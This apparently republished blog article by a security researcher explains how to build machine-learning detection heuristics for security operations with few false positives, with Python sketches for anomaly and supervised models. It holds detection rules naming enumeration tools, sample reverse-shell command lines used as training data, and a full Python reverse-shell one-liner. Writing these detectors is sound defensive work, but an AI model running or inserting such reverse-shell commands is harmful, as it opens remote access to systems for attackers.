Architecture of AI-Driven Security Operations with a Low False Positive Rate

This article discusses a mindset for building production-ready machine learning solutions applied to cyber-security needs.

Dmitrijs Trizna
Towards Data Science

--

Figure 1. Anomalies on NL2Bash data. Code. Security analysts want to avoid seeing this picture in their dashboards. Image by the author.

Even today, in a world where LLMs undermine the integrity of the educational system we have relied on for decades, and we (finally) started to feel existential dread about AGI, the applicability of artificial intelligence (AI) systems to non-conventional data science domains is far from futuristic milestones and requires a distinct approach.

In this article, we have a conceptual discussion about AI applicability to cyber-security, why most applications fail, and what methodology actually works. Speculatively, the provided approach and conclusions are transferable to other application domains with low false-positive requirements, especially ones that rely on inference from system logs.

We will not cover how to implement machine learning (ML) logic on data relevant to information security; I have already provided functional implementations with code samples in previous articles.

Signatures

Even today, the fundamental and most valuable component of a mature security posture is plain, targeted signature rules. Heuristics like the one exemplified below are an essential part of our defenses:

parent_process == "wmiprvse.exe"
&&
process == "cmd.exe"
&&
command_includes ("\\\\127.0.0.1\\ADMIN")

Honestly, rules like these are great. The one above is just an example: (simplified) logic shared by Red Canary for detecting lateral movement via WMI, as performed by tools like impacket. Never turn such rules off, and keep stacking more!
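
In code, such a rule is nothing more than a boolean predicate over process-creation telemetry. A minimal sketch in Python (the event schema and field names here are hypothetical, not any particular SIEM's):

def wmi_lateral_movement(event: dict) -> bool:
    """Fires when the WMI provider host spawns cmd.exe with a loopback
    ADMIN$ share in the command line, as impacket's wmiexec does."""
    return (
        event.get("parent_process", "").lower().endswith("wmiprvse.exe")
        and event.get("process", "").lower().endswith("cmd.exe")
        and "\\\\127.0.0.1\\ADMIN" in event.get("command_line", "")
    )

# Hypothetical telemetry record for illustration only.
event = {
    "parent_process": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
    "process": "C:\\Windows\\System32\\cmd.exe",
    "command_line": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__output 2>&1",
}
print(wmi_lateral_movement(event))  # True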

But this approach leaves gaps...

That’s why, once in a while, every Chief Information Security Officer (CISO) spends money, people, and time on a solution that promises to solve security problems through the magic of “machine learning”. Usually, this turns out to be a rabbit hole with a low return on investment: (1) the dashboards of security analysts light up like a Christmas tree (consider Figure 1 above); (2) analysts get alert fatigue; (3) ML heuristics are disabled or simply ignored.

General vs. Narrow Heuristics

Let me first bring to your attention the concept of narrow and general intelligence, since it transfers directly to security heuristics.

Intelligence, in broad terms, is the ability to achieve goals. Humans are believed to have general intelligence since we are able to “generalize” and achieve goals we were never required to reach in an environment driven by natural selection and genetic imperative, like landing on the Moon.

While generalization allowed our species to conquer the world, there are entities that are much better than we are at a narrow set of tasks. For instance, calculators are far better at arithmetic than the cleverest of us, like von Neumann, could ever be, and squirrels (!) significantly outperform humans at memorizing the locations of acorns hidden last year.

Figure 2. Schematic view on intelligence. Image by the author.

We can reason about security heuristics in a similar way. There are rules that are heavily focused on a specific tool or CVE, and rules that attempt to detect a broader set of techniques. For instance, consider this detection logic focused solely on sudo privilege escalation abusing CVE-2019-14287:

CommandLine|contains: ' -u#'

On the contrary, this webshell detection rule (replicated in redacted form) attempts to implement a significantly broader logic:

ParentImage|endswith:
- '/httpd'
- '/nginx'
- '/apache2'
...

&&
Image|endswith:
- '/whoami'
- '/ifconfig'
- '/netstat'

It defines a more sophisticated behavioral heuristic that links the parent processes of common HTTP servers to enumeration activity on the compromised host.

Resembling the intelligence landscape above, we can visualize a security posture by mapping detection rules to the landscape of offensive tactics, techniques, and procedures (TTPs) as follows:

Figure 3. Schematic view of your security posture. Note the gaps, and don’t flatter yourself — you have more of them. Image by the author.

False-Positives vs. False-Negatives

The sudo CVE rule detects only one specific technique and misses all others (an extremely high False-Negative rate). On the contrary, the webshell rule might detect a whole set of offensive techniques and webshell tools from the Kali Linux arsenal.

The obvious question is: why, then, don’t we just cover all possible TTPs with a few broad behavioral rules?

Because they bring False-Positives… A lot.

Here we observe a False-Positive vs. False-Negative trade-off.

While most organizations can just copy-paste the sudo CVE rule and enable it right away in their SIEMs, the webshell rule might run for a while in “monitor only” mode while security analysts filter out all legitimate triggers observed in their environment.

By building detections, security engineers try to answer not so much what is malicious as what is not representative of their environment.

They might see alerts from automation created by system administrators, like a REST API request that triggers one of the enumeration actions, or an Ansible shell script that creates weird parent-child process relationships when deployed. Eventually, I have observed broad behavioral rules become lists with dozens of exclusions and more edits per month than active code repositories. That is why security engineers limit the broadness of their rules: expanding generalization is costly, and they try to keep the False-Positive rate as low as possible.

Failures of Machine Learning as a Security Heuristic

At this point, security professionals start to look for alternative techniques to implement behavioral heuristics. The requirements for ML implementations are a priori broad. Most often, intuition leads security professionals to unsupervised learning: we task AI with capturing anomalies in the network, alerting on anomalous command lines, et cetera. These tasks sit at the generalization level of “solve security for me”. No surprise it works poorly in production.

Actually, ML often does exactly what we ask. It may report an anomalous elevator.exe binary that IntelliJ uses to update itself for the first time, or a new CDN that Spotify started using for updates with a jittered delay, exactly like a Command and Control callback. And hundreds of similar behaviors, all of which were indeed anomalous that day.

In cases where supervised learning is possible because large labeled datasets can be assembled, for instance malware detection, we are indeed capable of building high-quality modeling schemes like EMBER that generalize well.

But even in solutions like these, modern AI models in infosec do not yet possess wide enough context to parse the “gray” area. For instance, do we consider TeamViewer bad or good? Many small and medium-sized businesses use it as a cheap VPN. At the same time, some of those “businesses” are ransomware groups that backdoor target networks using exactly such tools.

Successes of Machine Learning as a Security Heuristic

ML-based heuristics should follow the same ideology as rule-based detection: be focused on a specific set of malicious TTPs. To apply AI in security, you actually need some knowledge and intuition in security. Sorry, data scientists. ¯\_(ツ)_/¯ At least today, until LLMs achieve generalization broad enough to solve security challenges (and many other tasks) collaterally.

For instance, instead of asking for anomalies in all command lines (and getting results like those in Figure 1 at the top of this article, with 634 anomalies on a modestly sized dataset), ask for out-of-baseline activity around a specific offensive technique, e.g., anomalous Python executions (T1059.006), and voilà: given the same ML algorithm, preprocessing, and modeling technique, we get only one anomaly, which is actually a Python reverse shell:

Figure 4. Python anomalies in the NL2Bash dataset expanded by malicious techniques. Anomaly reports Python reverse shell. Code. Image by the author.
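
A minimal sketch of that narrowing, assuming process-creation telemetry lands in a pandas DataFrame with hypothetical process and command_line columns; the TF-IDF vectorizer and Isolation Forest are generic scikit-learn stand-ins, not the exact setup behind Figure 4:

import pandas as pd
from sklearn.ensemble import IsolationForest
from sklearn.feature_extraction.text import TfidfVectorizer

# Hypothetical process-creation telemetry.
telemetry = pd.DataFrame({
    "process": ["/usr/bin/python3", "/usr/bin/python3", "/bin/ls", "/usr/bin/python3"],
    "command_line": [
        "python3 manage.py runserver",
        "python3 -c 'import socket,subprocess,os; ...'",
        "ls -la /tmp",
        "python3 -m pip install requests",
    ],
})

# Step 1: narrow the input to a single technique (T1059.006, python executions).
python_events = telemetry[telemetry["process"].str.contains("python")].copy()

# Step 2: model as few dimensions as possible -- here, only the command-line tokens.
vectorizer = TfidfVectorizer(token_pattern=r"[^\s]+")
X = vectorizer.fit_transform(python_events["command_line"]).toarray()

detector = IsolationForest(contamination=0.34, random_state=0).fit(X)
python_events["anomaly"] = detector.predict(X)  # -1 marks out-of-baseline executions
print(python_events[python_events["anomaly"] == -1][["command_line"]])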

Examples of unsupervised Unix-focused techniques that work:

  • Anomalous python/perl/ruby process (execution via scripting interpreter, T1059.006);
  • Anomalous systemd command (persistence via systemd process, T1543.002);
  • Anomalous ssh login source to high severity jumpbox (T1021.004).

Examples of unsupervised Windows-focused techniques that work:

  • Anomalous user logged on to Domain Controllers or MSSQL servers (T1021.002), sketched in code after this list;
  • An anomalous process that loads NTDLL.DLL (T1129);
  • Network connection with anomalous RDP client and server combination (T1021.001).
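
A categorical baseline like the first Windows item above does not even require an ML library; a set of previously seen (host, user) logon pairs is enough for a minimal sketch (host names, users, and field names are made up):

from collections import defaultdict

# Hypothetical history of logons to high-value hosts.
history = [("DC01", "svc_backup"), ("DC01", "admin_jane"), ("MSSQL01", "svc_sql")]

baseline = defaultdict(set)
for host, user in history:
    baseline[host].add(user)

def anomalous_logon(event: dict) -> bool:
    """Flags a logon from a user never observed on that host before."""
    return event["user"] not in baseline[event["host"]]

print(anomalous_logon({"host": "DC01", "user": "admin_jane"}))  # False: already in the baseline
print(anomalous_logon({"host": "DC01", "user": "tmp_admin"}))   # True: out of baseline, worth a look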

Examples of functional supervised ML baselines:

  • Reverse shell model: generate the malicious part of the dataset from known methods (take inspiration from generators like this) and use process creation events from your environment’s telemetry as the legitimate counterpart; a minimal training sketch follows Figure 5 below.
  • Rather than trying to build rules that are robust against obfuscation, like the one exemplified in Figure 5 below (spoiler: you won’t succeed), build a separate ML model that detects obfuscation as its own technique. Here is a good article on this topic by Mandiant.
Figure 5. Example of simple cmd.exe command line obfuscation. Image by the author.
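
Returning to the reverse shell baseline from the first bullet above: a minimal supervised sketch, assuming you already have generated malicious command lines and benign ones from your own telemetry; TF-IDF plus logistic regression is a generic choice for illustration, not a prescribed architecture:

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# Hypothetical training data: generated reverse shells (label 1) vs. benign telemetry (label 0).
malicious = [
    "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "nc -e /bin/sh 10.0.0.5 4444",
    "python3 -c 'import socket,subprocess,os; ...'",
]
benign = [
    "ls -la /var/log",
    "python3 manage.py migrate",
    "tar -czf backup.tgz /etc",
    "grep -r TODO ./src",
]
X = malicious + benign
y = [1] * len(malicious) + [0] * len(benign)

model = make_pipeline(TfidfVectorizer(token_pattern=r"[^\s]+"), LogisticRegression())
model.fit(X, y)

# Score unseen command lines: higher probability means more reverse-shell-like.
unseen = ["sh -i >& /dev/tcp/192.168.1.20/9001 0>&1", "du -sh /home/*"]
print(model.predict_proba(unseen)[:, 1])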

Machine Learning is an Extension of Signature Logic

To systematize the examples above, a successful application of an ML heuristic consists of two steps:

  1. Narrow down the input data so that it captures telemetry generated by a specific TTP as precisely as possible;
  2. Define as few dimensions as possible along which to look for out-of-baseline activity (e.g., logic that looks only at process.image will raise fewer alerts than logic that additionally looks at parent.process.image and process.args); a toy illustration follows this list.
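
A toy illustration of Step 2, assuming a DataFrame of process events with hypothetical column names: baselining along one dimension yields fewer distinct combinations, and therefore fewer out-of-baseline alerts, than baselining along three.

import pandas as pd

events = pd.DataFrame({
    "process_image": ["whoami", "whoami", "whoami"],
    "parent_image": ["bash", "httpd", "sshd"],
    "process_args": ["", "", ""],
})

# One dimension: a single baseline entry, nothing new to alert on.
print(events[["process_image"]].drop_duplicates().shape[0])  # 1

# Three dimensions: every parent/args combination is its own baseline entry.
print(events[["process_image", "parent_image", "process_args"]].drop_duplicates().shape[0])  # 3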

Step 1 above is actually how we create signature rules.

Do you remember how we discussed above that, prior to enabling the webshell rule, security analysts “filter out all legitimate triggers observed in their environment”? That is Step 2.

In that manual case, a person builds the decision boundary between legitimate and malicious activity. This is exactly where contemporary ML algorithms are good: ML heuristics can remove the burden of manually filtering out vast quantities of legitimate activity around a specific TTP. Thus, ML allows building broader heuristics than signature rules with less work.

ML is just another way to achieve the same goal, an extension of signatures.

Swiss Cheese Model

Now we are ready to outline a holistic vision.

The traditional detection engineering approach is to stack as many signature rules as possible without overflowing SOC dashboards. Each of these rules has a high False Negative Rate (FNR) but a low False Positive Rate (FPR).

We can keep stacking ML heuristics with the same requirement on FPR: it has to be low to protect the only bottleneck, human analyst attention. ML heuristics cover gaps in rule-based detections by introducing more general behavioral logic without significantly depleting security engineers’ time.

If you have covered most of the low-hanging fruit and want to go deeper into behavioral analytics, you can add deep learning logic on top of what you already have.

Figure 6. A holistic view of collaborative work of security heuristics that use different techniques to achieve the same goal.

Remember Occam’s razor and implement every new heuristic as simply as possible. Do not use ML unless signature rules cannot define a reliable baseline.

Each slice in this model should have a low False Positive Rate. You can tolerate a high number of False Negatives; to combat them, just add more slices.

For instance, in the example above with anomalous Python executions, Python arguments might still be too variable in your environment, alerting you with too much anomalous activity. You might need to narrow it down further, for instance, by capturing only processes that have -c in the command line, looking for cases where code is passed as an argument to the Python binary and therefore focusing only on techniques like this Python reverse shell (a one-line filter sketch follows the command below):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
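
Narrowing the Figure 4 heuristic this way is a one-line filter before anything reaches the anomaly model; a sketch with the same hypothetical columns as before:

import pandas as pd

telemetry = pd.DataFrame({
    "process": ["/usr/bin/python3", "/usr/bin/python3"],
    "command_line": ["python3 manage.py runserver", "python3 -c 'import socket,subprocess,os; ...'"],
})

# Keep only python executions that pass code inline via -c.
inline_python = telemetry[
    telemetry["process"].str.contains("python")
    & telemetry["command_line"].str.contains(r"\s-c\s")
]
print(inline_python["command_line"].tolist())  # only the 'python3 -c ...' event remains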

Since we decrease the FPR, we increase False-Negatives. You might now miss executions of Python scripts with unusual names, like python fake_server.py, which an attacker might use to spoof a legitimate service. For those, you might want to create a separate heuristic that focuses on that subset of TTPs and has a low FPR of its own.

Meta-Detection Layer

It is worth noting that even when following the Swiss Cheese methodology, you will end up with verbose heuristics. Usually, those do not represent maliciousness a priori but are interesting in context.

For instance, an SSH/RDP login to a high-severity host from a new source is not necessarily bad (perhaps just a new employee or workstation), and execution of whoami /all might be common among skilled users. Neither heuristic on its own is suitable for directly triggering an alert. However, a combination of the two might be worth an analyst’s attention.

The solution to this dilemma is to introduce additional logic on top of such verbose rules that yield “True Positive Benigns”. We can call it the meta-detection layer.

Figure 7. A schematic view of alerting setup that includes a dedicated parsing of verbose but useful rules.

The meta-logic that is applied on top of rule activations can vary but usually involves two steps:

  1. “Group by” all activations by an “entity”, e.g., host, username, source IP, cookie, etc.
  2. Apply an “aggregate function” on activations within some time period.

Examples of simple yet functional meta-detection logic:

  • just count the number of different rule triggers from a single entity, like a single host or user, and report if it exceeds a threshold, e.g., more than three different rules triggered within three hours;
  • the same as above, but apply a weighted sum over rules based on severity, e.g., a “critical” rule counts as 3, “medium” as 2, “info” as 1; report if the sum exceeds a threshold, like sum > 6 (both variants are sketched below).
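
Both variants reduce to a group-by over an entity and an aggregate over a time window; a minimal pandas sketch, with a hypothetical table of rule activations and the thresholds from the bullets above:

import pandas as pd

# Hypothetical rule activations: one row per heuristic trigger.
activations = pd.DataFrame({
    "timestamp": pd.to_datetime([
        "2023-05-01 10:05", "2023-05-01 10:40", "2023-05-01 11:30",
        "2023-05-01 11:50", "2023-05-02 09:00",
    ]),
    "entity": ["host-A", "host-A", "host-A", "host-A", "host-B"],
    "rule": ["anomalous_ssh_source", "whoami_enumeration", "anomalous_python",
             "new_rdp_pair", "whoami_enumeration"],
    "severity": ["medium", "info", "critical", "medium", "info"],
})
activations["weight"] = activations["severity"].map({"critical": 3, "medium": 2, "info": 1})

# Group by entity within 3-hour buckets and aggregate.
# (A rolling window is a straightforward refinement over fixed buckets.)
summary = activations.groupby(["entity", pd.Grouper(key="timestamp", freq="3h")]).agg(
    distinct_rules=("rule", "nunique"),
    weighted_sum=("weight", "sum"),
)

# Alert when either meta-threshold is exceeded (host-A trips both in the morning bucket).
alerts = summary[(summary["distinct_rules"] > 3) | (summary["weighted_sum"] > 6)]
print(alerts)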

More sophisticated methods exist, like the one defined in the following AISec ’22 publication, where I use a second layer of ML on top of malware representations. These should be tuned to a specific application and environment, since data specifics, amount of telemetry, and infrastructure size might require a different approach to stay below the acceptable alert limit.

Conclusions

In this article, we discussed a mindset behind expanding your security operations arsenal beyond a signature approach. Most implementations fail to do it properly because security professionals define overly broad requirements for behavioral heuristics built with machine learning (ML).

We argue that proper application should be driven by offensive tactics, techniques, and procedures (TTPs). Used properly, ML techniques save a vast amount of human effort by efficiently filtering out the baseline of legitimate activity around specific TTPs.

A mature and successful security posture will consist of signature and behavioral heuristics combined, where every separate detection logic has a low False-Positive rate, and the resulting False-Negatives are offset by stacking multiple heuristics in parallel.

The examples in this article came from detection engineering as applied to conventional security operations. However, we argue that the same methodology, with limited modifications, will be useful in other security applications, for instance, the EDR/XDR heuristic space, network traffic analysis, and beyond.

Appendix

Technical Note: Estimate Detection Rate under Fixed False Positive Rate

This is a note, with a code sample, on how to evaluate the utility of a behavioral ML heuristic in a production environment.

Data scientists: forget about accuracy, F1-score, and AUC. These give little to no information about the production readiness of security solutions. Such metrics can be used to reason about the relative utility of multiple solutions, but not about their absolute value.

This is because of the base rate fallacy in security telemetry: basically, all the data your model will see are benign samples (until they are not, which is what really matters). Therefore, even a false-positive rate of 0.001 (i.e., 0.1%) will bring you 10 alerts a day if your heuristic performs 10 000 checks daily.

The only true value of your model can be estimated by looking at the Detection Rate (aka, True Positive Rate, TPR) under a fixed False Positive Rate (FPR).

Consider the plot below: the x-axis represents the true label of a data sample, either malicious or benign. The y-axis shows the model’s probabilistic prediction, i.e., how bad it thinks the sample is:

Figure 8. Distribution of predictions on the extended NL2Bash data. Code. Image by the author.

If you are allowed to raise only one false alert, you have to set the model’s decision threshold at around ~0.75 (dashed red line), just above the second false positive. Therefore, the realistic detection rate of the model is ~50% (the dotted line almost overlaps with the mean value of the boxplot).

Evaluation of detection rates under variable false positive rates, given you have y_true (true labels) and preds (model predictions), can be done with the code sample below:
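
The embedded gist is not reproduced here; below is a minimal equivalent with scikit-learn (the helper name and the toy scores are illustrative, not the author's original code):

import numpy as np
from sklearn.metrics import roc_curve

def detection_rate_at_fpr(y_true, preds, target_fpr=0.001):
    """Return (TPR, threshold) for the best operating point whose FPR stays within target_fpr."""
    fpr, tpr, thresholds = roc_curve(y_true, preds)
    mask = fpr <= target_fpr
    if not mask.any():
        return 0.0, None
    best = np.argmax(tpr[mask])  # highest detection rate within the false-positive budget
    return tpr[mask][best], thresholds[mask][best]

# Toy example: 8 benign (0) and 4 malicious (1) samples with model scores.
y_true = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])
preds  = np.array([0.01, 0.05, 0.10, 0.20, 0.30, 0.40, 0.60, 0.80, 0.55, 0.70, 0.90, 0.95])

for budget in (0.0, 0.125, 0.25):
    dr, thr = detection_rate_at_fpr(y_true, preds, target_fpr=budget)
    print(f"FPR <= {budget:.3f}: detection rate {dr:.2f} at threshold {thr}")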


--

Sr. Security Researcher @ Microsoft. This blog is an independent R&D at the intersection of Machine Learning and Cyber-Security.